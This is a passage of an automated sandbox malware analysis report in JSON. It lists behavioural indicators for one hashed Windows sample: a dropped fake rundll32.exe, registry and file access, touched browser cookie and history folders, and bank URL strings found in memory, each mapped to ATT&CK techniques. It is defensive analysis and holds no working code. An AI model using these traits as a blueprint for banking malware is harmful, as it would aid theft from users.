\"rundll32.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00005856)\n \"rundll32.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00005856)\n \"rundll32.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00005856)\n \"rundll32.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00005856)\n \"rundll32.exe\" called \"LoadLibrary\" with a parameter Secur32.dll (UID: 00000000-00005856)\n \"rundll32.exe\" called \"LoadLibrary\" with a parameter SHELL32.dll (UID: 00000000-00005856)\n \"rundll32.exe\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00005856)\n \"rundll32.exe\" called \"LoadLibrary\" with a parameter api-ms-win-downlevel-ole32-l1-1-0.dll (UID: 00000000-00005856)\n \"rundll32.exe\" called \"LoadLibrary\" with a parameter api-ms-win-downlevel-advapi32-l2-1-0.dll (UID: 00000000-00005856)\n \"rundll32.exe\" called \"LoadLibrary\" with a parameter urlmon.dll (UID: 00000000-00005856)\n \"rundll32.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\uxtheme.dll (UID: 00000000-00005856)\n \"rundll32.exe\" called \"LoadLibrary\" with a parameter api-ms-win-downlevel-shlwapi-l2-1-0.dll (UID: 00000000-00005856)\n \"rundll32.exe\" called \"LoadLibrary\" with a parameter WS2_32.dll (UID: 00000000-00005856)\n \"rundll32.exe\" called \"LoadLibrary\" with a parameter winhttp.dll (UID: 00000000-00005856)\n \"rundll32.exe\" called \"LoadLibrary\" with a parameter IPHLPAPI.DLL (UID: 00000000-00005856)\n \"rundll32.exe\" called \"LoadLibrary\" with a parameter OLEAUT32.dll (UID: 00000000-00005856)\n \"rundll32.exe\" called \"LoadLibrary\" with a parameter DNSAPI.dll (UID: 00000000-00005856)\n \"rundll32.exe\" called \"LoadLibrary\" with a parameter ole32.dll (UID: 00000000-00005856)\n \"rundll32.exe\" called \"LoadLibrary\" with a parameter dhcpcsvc.DLL (UID: 00000000-00005856)\n \"rundll32.exe\" called \"LoadLibrary\" with a parameter API-MS-Win-Security-LSALookup-L1-1-0.dll (UID: 00000000-00005856)\n \"rundll32.exe\" called \"LoadLibrary\" with a parameter CRYPTBASE.dll (UID: 00000000-00005856)\n \"rundll32.exe\" called \"LoadLibrary\" with a parameter Comctl32.dll (UID: 00000000-00005856)\n \"rundll32.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\ws2_32 (UID: 00000000-00005856)", "origin": "API Call", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129"}, {"threat_level_human": "informative", "category": "General", "identifier": "module-10", "type": 10, "name": "Loads the RPC (Remote Procedure Call) module DLL", "description": "\"531d6bd6c0207ffc145c714da946bae8a057be3a3fc7001f5ea800ef8c61679c.exe\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 775B0000\n \"rundll32.exe\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 775B0000", "origin": "Loaded Module", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129"}, {"threat_level_human": "informative", "category": "General", "identifier": "registry-25", "type": 3, "relevance": 3, "name": "Reads information about supported languages", "description": "\"531d6bd6c0207ffc145c714da946bae8a057be3a3fc7001f5ea800ef8c61679c.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\CUSTOMLOCALE\"; Key: \"EN-US\")\n \"531d6bd6c0207ffc145c714da946bae8a057be3a3fc7001f5ea800ef8c61679c.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\EXTENDEDLOCALE\"; Key: \"EN-US\")\n \"531d6bd6c0207ffc145c714da946bae8a057be3a3fc7001f5ea800ef8c61679c.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\LOCALE\"; Key: \"00000409\")\n \"rundll32.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\CUSTOMLOCALE\"; Key: \"EN-US\")\n \"rundll32.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\EXTENDEDLOCALE\"; Key: \"EN-US\")", "origin": "Registry Access", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-22", "type": 6, "relevance": 1, "name": "Fails to load modules at runtime", "description": "\"rundll32.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"rundll32.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]", "origin": "API Call", "attck_id": "T1574.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574/002"}, {"threat_level_human": "informative", "category": "General", "identifier": "target-25", "type": 9, "relevance": 3, "name": "Spawns new processes", "description": "Spawned process \"rundll32.exe\" (UID: 00000000-00005856)", "origin": "Monitored Target", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057"}, {"threat_level_human": "informative", "category": "General", "identifier": "target-103", "type": 9, "relevance": 3, "name": "Spawns new processes that are not known child processes", "description": "Spawned process \"rundll32.exe\" (UID: 00000000-00005856)", "origin": "Monitored Target", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-157", "name": "Matched Compiler/Packer signature (DIE)", "description": "\"531d6bd6c0207ffc145c714da946bae8a057be3a3fc7001f5ea800ef8c61679c\" was detected as \"MFC\" and name: \"Library\"\n \"531d6bd6c0207ffc145c714da946bae8a057be3a3fc7001f5ea800ef8c61679c\" was detected as \"EP:Microsoft Visual C/C++\" and name: \"Compiler\"\n \"531d6bd6c0207ffc145c714da946bae8a057be3a3fc7001f5ea800ef8c61679c\" was detected as \"Microsoft Visual C++\" and name: \"Compiler\"\n \"531d6bd6c0207ffc145c714da946bae8a057be3a3fc7001f5ea800ef8c61679c\" was detected as \"Microsoft Linker\" and name: \"Linker\"\n \"_.exe\" was detected as \"MFC\" and name: \"Library\"\n \"_.exe\" was detected as \"EP:Microsoft Visual C/C++\" and name: \"Compiler\"\n \"_.exe\" was detected as \"Microsoft Visual C++\" and name: \"Compiler\"\n \"_.exe\" was detected as \"Microsoft Linker\" and name: \"Linker\"\n \"rundll32.exe\" was detected as \"MFC\" and name: \"Library\"\n \"rundll32.exe\" was detected as \"EP:Microsoft Visual C/C++\" and name: \"Compiler\"\n \"rundll32.exe\" was detected as \"Microsoft Visual C++\" and name: \"Compiler\"\n \"rundll32.exe\" was detected as \"Microsoft Linker\" and name: \"Linker\"\n \"notepad_.exe\" was detected as \"MFC\" and name: \"Library\"\n \"notepad_.exe\" was detected as \"EP:Microsoft Visual C/C++\" and name: \"Compiler\"\n \"notepad_.exe\" was detected as \"Microsoft Visual C++\" and name: \"Compiler\"\n \"notepad_.exe\" was detected as \"Microsoft Linker\" and name: \"Linker\"", "origin": "Static Parser", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-79", "relevance": 1, "name": "Contains ability to dynamically determine API calls", "description": "Found GetProcAddress() and LoadLibraryA() in an import section (Source: 531d6bd6c0207ffc145c714da946bae8a057be3a3fc7001f5ea800ef8c61679c)\n Found GetProcAddress() and LoadLibraryA() in an import section (Source: _.exe)\n Found GetProcAddress() and LoadLibraryA() in an import section (Source: rundll32.exe)\n Found GetProcAddress() and LoadLibraryA() in an import section (Source: notepad_.exe)", "origin": "Static Parser", "attck_id": "T1027.007", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/007"}, {"threat_level_human": "informative", "category": "General", "identifier": "stream-103", "type": 1, "relevance": 3, "name": "Contains ability to delay the execution of current thread", "description": "Sleep@KERNEL32.dll at 61726-94-004086F0\n Sleep@KERNEL32.dll at 61726-103-004085A0\n Sleep@KERNEL32.dll at 61726-109-00405440", "origin": "Hybrid Analysis Technology", "attck_id": "T1497.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497/003"}, {"threat_level_human": "informative", "category": "Unusual Characteristics", "identifier": "string-23", "type": 2, "relevance": 2, "name": "Detected known bank URL artifact", "description": "\"www.credit-agricole.fr\" (Source: 00000000-00005856.00000001.66223.002F0000.00000004.mdmp, Indicator: \"credit-agricole.fr\")\n \"capitalone.com\" (Source: 00000000-00005856.00000001.66223.002F0000.00000004.mdmp, Indicator: \"capitalone.com\")", "origin": "File/Memory"}, {"threat_level_human": "informative", "category": "Unusual Characteristics", "identifier": "static-18", "relevance": 10, "name": "Matched Compiler/Packer signature", "description": "\"531d6bd6c0207ffc145c714da946bae8a057be3a3fc7001f5ea800ef8c61679c\" was detected as \"Microsoft visual C++ 5.0\"\n \"_.exe\" was detected as \"Microsoft visual C++ 5.0\"\n \"rundll32.exe\" was detected as \"Microsoft visual C++ 5.0\"\n \"notepad_.exe\" was detected as \"Microsoft visual C++ 5.0\"", "origin": "Static Parser", "attck_id": "T1027.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/002"}, {"threat_level_human": "informative", "category": "Unusual Characteristics", "identifier": "registry-26", "type": 3, "relevance": 2, "name": "Reads the windows installation language", "description": "\"531d6bd6c0207ffc145c714da946bae8a057be3a3fc7001f5ea800ef8c61679c.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\LANGUAGE GROUPS\"; Key: \"1\")", "origin": "Registry Access", "attck_id": "T1614.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1614/001"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-126", "type": 6, "relevance": 3, "name": "Tries to access non-existent files (executable)", "description": "\"531d6bd6c0207ffc145c714da946bae8a057be3a3fc7001f5ea800ef8c61679c.exe\" trying to access non-existent file \"C:\\MFC42.DLL\"\n \"531d6bd6c0207ffc145c714da946bae8a057be3a3fc7001f5ea800ef8c61679c.exe\" trying to access non-existent file \"C:\\ODBC32.dll\"\n \"531d6bd6c0207ffc145c714da946bae8a057be3a3fc7001f5ea800ef8c61679c.exe\" trying to access non-existent file \"C:\\version.DLL\"\n \"531d6bd6c0207ffc145c714da946bae8a057be3a3fc7001f5ea800ef8c61679c.exe\" trying to access non-existent file \"C:\\Windows\\system32\\MFC42LOC.DLL\"\n \"531d6bd6c0207ffc145c714da946bae8a057be3a3fc7001f5ea800ef8c61679c.exe\" trying to access non-existent file \"C:\\Windows\\system32\\MFC42LOC.DLL.DLL\"\n \"531d6bd6c0207ffc145c714da946bae8a057be3a3fc7001f5ea800ef8c61679c.exe\" trying to access non-existent file \"C:\\Windows\\IEXPLORE.EXE\"\n \"531d6bd6c0207ffc145c714da946bae8a057be3a3fc7001f5ea800ef8c61679c.exe\" trying to access non-existent file \"C:\\FLTLIB.DLL\"\n \"531d6bd6c0207ffc145c714da946bae8a057be3a3fc7001f5ea800ef8c61679c.exe\" trying to access non-existent file \"C:\\Windows\\system32\\api-ms-win-core-fibers-l1-1-1.DLL\"\n \"531d6bd6c0207ffc145c714da946bae8a057be3a3fc7001f5ea800ef8c61679c.exe\" trying to access non-existent file \"C:\\Windows\\system32\\api-ms-win-core-localization-l1-2-1.DLL\"\n \"531d6bd6c0207ffc145c714da946bae8a057be3a3fc7001f5ea800ef8c61679c.exe\" trying to access non-existent file \"C:\\Windows\\IEXPLORE .EXE\"\n \"531d6bd6c0207ffc145c714da946bae8a057be3a3fc7001f5ea800ef8c61679c.exe\" trying to access non-existent file \"C:\\Windows\\internat.exe\"\n \"531d6bd6c0207ffc145c714da946bae8a057be3a3fc7001f5ea800ef8c61679c.exe\" trying to access non-existent file \"C:\\Windows\\rundll32.exe\"\n \"531d6bd6c0207ffc145c714da946bae8a057be3a3fc7001f5ea800ef8c61679c.exe\" trying to access non-existent file \"C:\\Windows\\system32\\IEXPLORE.EXE\"\n \"531d6bd6c0207ffc145c714da946bae8a057be3a3fc7001f5ea800ef8c61679c.exe\" trying to access non-existent file \"C:\\Windows\\system32\\IEXPLORE .EXE\"\n \"531d6bd6c0207ffc145c714da946bae8a057be3a3fc7001f5ea800ef8c61679c.exe\" trying to access non-existent file \"C:\\Windows\\system32\\mssysint.exe\"\n \"531d6bd6c0207ffc145c714da946bae8a057be3a3fc7001f5ea800ef8c61679c.exe\" trying to access non-existent file \"C:\\Windows\\system32\\mspsint.exe\"\n \"531d6bd6c0207ffc145c714da946bae8a057be3a3fc7001f5ea800ef8c61679c.exe\" trying to access non-existent file \"C:\\Windows\\system32\\mspbint.exe\"\n \"531d6bd6c0207ffc145c714da946bae8a057be3a3fc7001f5ea800ef8c61679c.exe\" trying to access non-existent file \"C:\\Windows\\system32\\mspbbase.dll\"\n \"531d6bd6c0207ffc145c714da946bae8a057be3a3fc7001f5ea800ef8c61679c.exe\" trying to access non-existent file \"C:\\Windows\\system32\\mspbhook.dll\"\n \"531d6bd6c0207ffc145c714da946bae8a057be3a3fc7001f5ea800ef8c61679c.exe\" trying to access non-existent file \"C:\\Windows\\system32\\psinthk.dll\"\n \"531d6bd6c0207ffc145c714da946bae8a057be3a3fc7001f5ea800ef8c61679c.exe\" trying to access non-existent file \"C:\\Windows\\system32\\psintbs.dll\"", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "string-310", "type": 2, "relevance": 1, "name": "Contains ability to load modules (API string)", "description": "Found reference to API \"LoadLibraryA\" (Indicator: \"LoadLibrary\"; File: \"531d6bd6c0207ffc145c714da946bae8a057be3a3fc7001f5ea800ef8c61679c\")\n Found reference to API \"LoadLibraryA\" (Indicator: \"LoadLibrary\"; Source: \"00000000-00005736.00000001.66440.0040B000.00000040.mdmp\")\n Found reference to API \"LoadLibraryA\" (Indicator: \"LoadLibrary\"; Source: \"00000000-00005856.00000001.66223.0040B000.00000040.mdmp\")", "origin": "File/Memory", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-243", "type": 6, "relevance": 1, "name": "Reads files", "description": "\"531d6bd6c0207ffc145c714da946bae8a057be3a3fc7001f5ea800ef8c61679c.exe\" reads file \"c:\\531d6bd6c0207ffc145c714da946bae8a057be3a3fc7001f5ea800ef8c61679c.exe\"", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "registry-177", "type": 3, "relevance": 1, "name": "Opens registry keys", "description": "\"531d6bd6c0207ffc145c714da946bae8a057be3a3fc7001f5ea800ef8c61679c.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\SESSION MANAGER\"; Key: \"\"; Value: \"\")\n \"531d6bd6c0207ffc145c714da946bae8a057be3a3fc7001f5ea800ef8c61679c.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\TERMINAL SERVER\"; Key: \"\"; Value: \"\")\n \"531d6bd6c0207ffc145c714da946bae8a057be3a3fc7001f5ea800ef8c61679c.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\SAFEBOOT\\OPTION\"; Key: \"\"; Value: \"\")\n \"531d6bd6c0207ffc145c714da946bae8a057be3a3fc7001f5ea800ef8c61679c.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\SRP\\GP\\DLL\"; Key: \"\"; Value: \"\")\n \"531d6bd6c0207ffc145c714da946bae8a057be3a3fc7001f5ea800ef8c61679c.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\POLICIES\\MICROSOFT\\WINDOWS\\SAFER\\CODEIDENTIFIERS\"; Key: \"\"; Value: \"\")\n \"531d6bd6c0207ffc145c714da946bae8a057be3a3fc7001f5ea800ef8c61679c.exe\" (Access type: \"OPEN\"; Path: \"HKCU\\SOFTWARE\\POLICIES\\MICROSOFT\\WINDOWS\\SAFER\\CODEIDENTIFIERS\"; Key: \"\"; Value: \"\")\n \"531d6bd6c0207ffc145c714da946bae8a057be3a3fc7001f5ea800ef8c61679c.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\SORTING\\VERSIONS\"; Key: \"\"; Value: \"\")\n \"531d6bd6c0207ffc145c714da946bae8a057be3a3fc7001f5ea800ef8c61679c.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\ERROR MESSAGE INSTRUMENT\"; Key: \"\"; Value: \"\")\n \"531d6bd6c0207ffc145c714da946bae8a057be3a3fc7001f5ea800ef8c61679c.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\GRE_INITIALIZE\"; Key: \"\"; Value: \"\")\n \"531d6bd6c0207ffc145c714da946bae8a057be3a3fc7001f5ea800ef8c61679c.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\COMPATIBILITY32\"; Key: \"\"; Value: \"\")\n \"531d6bd6c0207ffc145c714da946bae8a057be3a3fc7001f5ea800ef8c61679c.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\IME COMPATIBILITY\"; Key: \"\"; Value: \"\")\n \"531d6bd6c0207ffc145c714da946bae8a057be3a3fc7001f5ea800ef8c61679c.exe\" (Access type: \"OPEN\"; Path: \"HKLM\"; Key: \"\"; Value: \"\")\n \"531d6bd6c0207ffc145c714da946bae8a057be3a3fc7001f5ea800ef8c61679c.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\WINDOWS\"; Key: \"\"; Value: \"\")\n \"531d6bd6c0207ffc145c714da946bae8a057be3a3fc7001f5ea800ef8c61679c.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\OLE\"; Key: \"\"; Value: \"\")\n \"531d6bd6c0207ffc145c714da946bae8a057be3a3fc7001f5ea800ef8c61679c.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\OLE\\TRACING\"; Key: \"\"; Value: \"\")\n \"531d6bd6c0207ffc145c714da946bae8a057be3a3fc7001f5ea800ef8c61679c.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\OLEAUT\"; Key: \"\"; Value: \"\")", "origin": "Registry Access", "attck_id": "T1012", "attck_id_wiki": "https://attack.mitre.org/techniques/T1012"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-263", "type": 6, "relevance": 1, "name": "Touches files", "description": "\"531d6bd6c0207ffc145c714da946bae8a057be3a3fc7001f5ea800ef8c61679c.exe\" trying to touch file \"C:\\MFC42.DLL\"\n \"531d6bd6c0207ffc145c714da946bae8a057be3a3fc7001f5ea800ef8c61679c.exe\" trying to touch file \"C:\\Windows\\system32\\MFC42.DLL\"\n \"531d6bd6c0207ffc145c714da946bae8a057be3a3fc7001f5ea800ef8c61679c.exe\" trying to touch file \"C:\\ODBC32.dll\"\n \"531d6bd6c0207ffc145c714da946bae8a057be3a3fc7001f5ea800ef8c61679c.exe\" trying to touch file \"C:\\Windows\\system32\\ODBC32.dll\"\n \"531d6bd6c0207ffc145c714da946bae8a057be3a3fc7001f5ea800ef8c61679c.exe\" trying to touch file \"C:\\Windows\\SYSTEM32\\sechost.dll\"\n \"531d6bd6c0207ffc145c714da946bae8a057be3a3fc7001f5ea800ef8c61679c.exe\" trying to touch file \"C:\\version.DLL\"\n \"531d6bd6c0207ffc145c714da946bae8a057be3a3fc7001f5ea800ef8c61679c.exe\" trying to touch file \"C:\\Windows\\system32\\version.DLL\"\n \"531d6bd6c0207ffc145c714da946bae8a057be3a3fc7001f5ea800ef8c61679c.exe\" trying to touch file \"C:\\Windows\\system32\\IMM32.DLL\"\n \"531d6bd6c0207ffc145c714da946bae8a057be3a3fc7001f5ea800ef8c61679c.exe\" trying to touch file \"C:\\Windows\\system32\\odbcint.dll\"\n \"531d6bd6c0207ffc145c714da946bae8a057be3a3fc7001f5ea800ef8c61679c.exe\" trying to touch file \"C:\\Windows\\system32\\MFC42LOC.DLL\"\n \"531d6bd6c0207ffc145c714da946bae8a057be3a3fc7001f5ea800ef8c61679c.exe\" trying to touch file \"C:\\Windows\\system32\\MFC42LOC.DLL.DLL\"\n \"531d6bd6c0207ffc145c714da946bae8a057be3a3fc7001f5ea800ef8c61679c.exe\" trying to touch file \"C:\\Windows\\IEXPLORE.EXE\"\n \"531d6bd6c0207ffc145c714da946bae8a057be3a3fc7001f5ea800ef8c61679c.exe\" trying to touch file \"C:\\Windows\\Temp\\VxOle32.dll\"\n \"531d6bd6c0207ffc145c714da946bae8a057be3a3fc7001f5ea800ef8c61679c.exe\" trying to touch file \"C:\\FLTLIB.DLL\"\n \"531d6bd6c0207ffc145c714da946bae8a057be3a3fc7001f5ea800ef8c61679c.exe\" trying to touch file \"C:\\Windows\\system32\\FLTLIB.DLL\"\n \"531d6bd6c0207ffc145c714da946bae8a057be3a3fc7001f5ea800ef8c61679c.exe\" trying to touch file \"C:\\Windows\\system32\\api-ms-win-core-synch-l1-2-0.DLL\"\n \"531d6bd6c0207ffc145c714da946bae8a057be3a3fc7001f5ea800ef8c61679c.exe\" trying to touch file \"C:\\Windows\\system32\\api-ms-win-core-fibers-l1-1-1.DLL\"\n \"531d6bd6c0207ffc145c714da946bae8a057be3a3fc7001f5ea800ef8c61679c.exe\" trying to touch file \"C:\\Windows\\system32\\api-ms-win-core-localization-l1-2-1.DLL\"\n \"531d6bd6c0207ffc145c714da946bae8a057be3a3fc7001f5ea800ef8c61679c.exe\" trying to touch file \"\\FileSystem\\Filters\\FltMgrMsg\"\n \"531d6bd6c0207ffc145c714da946bae8a057be3a3fc7001f5ea800ef8c61679c.exe\" trying to touch file \"C:\\Windows\\Temp\\VxSSL32.dll\"\n \"531d6bd6c0207ffc145c714da946bae8a057be3a3fc7001f5ea800ef8c61679c.exe\" trying to touch file \"C:\\Windows\\IEXPLORE .EXE\"", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-264", "type": 6, "relevance": 3, "name": "Creates a thread in a self process", "description": "\"rundll32.exe\" creates a thread in process \"-1\" (Handle: 4294967295)", "origin": "API Call", "attck_id": "T1055.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/003"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-242", "type": 6, "relevance": 1, "name": "Writes files", "description": "\"531d6bd6c0207ffc145c714da946bae8a057be3a3fc7001f5ea800ef8c61679c.exe\" writes file \"c:\\windows\\system32\\¢«.exe\"", "origin": "API Call"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-55", "type": 6, "relevance": 7, "name": "Touches files in the Windows directory", "description": "\"531d6bd6c0207ffc145c714da946bae8a057be3a3fc7001f5ea800ef8c61679c.exe\" touched file \"C:\\Windows\\AppPatch\\sysmain.sdb\"\n \"531d6bd6c0207ffc145c714da946bae8a057be3a3fc7001f5ea800ef8c61679c.exe\" touched file \"C:\\Windows\\System32\\¢«.exe\"\n \"531d6bd6c0207ffc145c714da946bae8a057be3a3fc7001f5ea800ef8c61679c.exe\" touched file \"C:\\Windows\\System32\\notepad¢¬.exe\"\n \"531d6bd6c0207ffc145c714da946bae8a057be3a3fc7001f5ea800ef8c61679c.exe\" touched file \"C:\\Windows\\system\"\n \"531d6bd6c0207ffc145c714da946bae8a057be3a3fc7001f5ea800ef8c61679c.exe\" touched file \"C:\\Windows\\system\\rundll32.exe\"\n \"rundll32.exe\" touched file \"C:\\Windows\\AppPatch\\sysmain.sdb\"\n \"rundll32.exe\" touched file \"C:\\Users\\%OSUSER%\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\"\n \"rundll32.exe\" touched file \"C:\\Users\\%OSUSER%\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\"\n \"rundll32.exe\" touched file \"C:\\Users\\%OSUSER%\\AppData\\Local\\Microsoft\\Windows\\History\"\n \"rundll32.exe\" touched file \"C:\\Users\\%OSUSER%\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\counters.dat\"\n \"rundll32.exe\" touched file \"%LOCALAPPDATA%\\Microsoft\\Windows\\Temporary Internet Files\"\n \"rundll32.exe\" touched file \"%APPDATA%\\Microsoft\\Windows\\Cookies\"\n \"rundll32.exe\" touched file \"%LOCALAPPDATA%\\Microsoft\\Windows\\History\"\n \"rundll32.exe\" touched file \"%LOCALAPPDATA%\\Microsoft\\Windows\\Temporary Internet Files\\counters.dat\"", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-235", "type": 6, "relevance": 1, "name": "Queries basic information of the specified process", "description": "\"531d6bd6c0207ffc145c714da946bae8a057be3a3fc7001f5ea800ef8c61679c.exe\" queries basic process information of the \"C:\\Windows\\system\\rundll32.exe\" (UID: 5736)", "origin": "API Call", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-161", "type": 6, "relevance": 3, "name": "Tries to access non-existent files (non-executable)", "description": "\"rundll32.exe\" trying to access non-existent file \"C:\\Windows\\system\\WINSPOOL.DRV\"\n \"rundll32.exe\" trying to access non-existent file \"\\Device\\RasAcd\"\n \"rundll32.exe\" trying to access non-existent file \"C:\\Windows\\system\\rundll32.exe.Local\\\"\n \"rundll32.exe\" trying to access non-existent file \"C:\\Windows\\system\\RUNDLL32.EXE.LOCAL\"", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "binary-0", "type": 8, "relevance": 3, "name": "Dropped files", "description": "\"_.exe\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- [targetUID: N/A]\n \"rundll32.exe\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- Location: [%WINDIR%\\system\\rundll32.exe]- [targetUID: 00000000-00005856]\n \"notepad_.exe\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- [targetUID: N/A]\n \"RUNDLL32.EXE.67A47CBF.bin\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- [targetUID: N/A]", "origin": "Binary File", "attck_id": "T1105", "attck_id_wiki": "https://attack.mitre.org/techniques/T1105"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-16", "type": 6, "relevance": 1, "name": "Connects to LPC ports", "description": "\"531d6bd6c0207ffc145c714da946bae8a057be3a3fc7001f5ea800ef8c61679c.exe\" connecting to \"\\ThemeApiPort\"\n \"rundll32.exe\" connecting to \"\\ThemeApiPort\"", "origin": "API Call", "attck_id": "T1559", "attck_id_wiki": "https://attack.mitre.org/techniques/T1559"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "registry-172", "type": 3, "relevance": 1, "name": "Queries registry keys", "description": "\"531d6bd6c0207ffc145c714da946bae8a057be3a3fc7001f5ea800ef8c61679c.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\SESSION MANAGER\"; Key: \"CWDILLEGALINDLLSEARCH\"; Value: \"\")\n \"531d6bd6c0207ffc145c714da946bae8a057be3a3fc7001f5ea800ef8c61679c.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\TERMINAL SERVER\"; Key: \"TSAPPCOMPAT\"; Value: \"\")\n \"531d6bd6c0207ffc145c714da946bae8a057be3a3fc7001f5ea800ef8c61679c.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\TERMINAL SERVER\"; Key: \"TSUSERENABLED\"; Value: \"\")\n \"531d6bd6c0207ffc145c714da946bae8a057be3a3fc7001f5ea800ef8c61679c.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\POLICIES\\MICROSOFT\\WINDOWS\\SAFER\\CODEIDENTIFIERS\"; Key: \"TRANSPARENTENABLED\"; Value: \"\")\n \"531d6bd6c0207ffc145c714da946bae8a057be3a3fc7001f5ea800ef8c61679c.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\SORTING\\VERSIONS\"; Key: \"COMPATDLL\"; Value: \"\")\n \"531d6bd6c0207ffc145c714da946bae8a057be3a3fc7001f5ea800ef8c61679c.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\SORTING\\VERSIONS\"; Key: \"00060101.00060101\"; Value: \"\")\n \"531d6bd6c0207ffc145c714da946bae8a057be3a3fc7001f5ea800ef8c61679c.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\SORTING\\VERSIONS\"; Key: 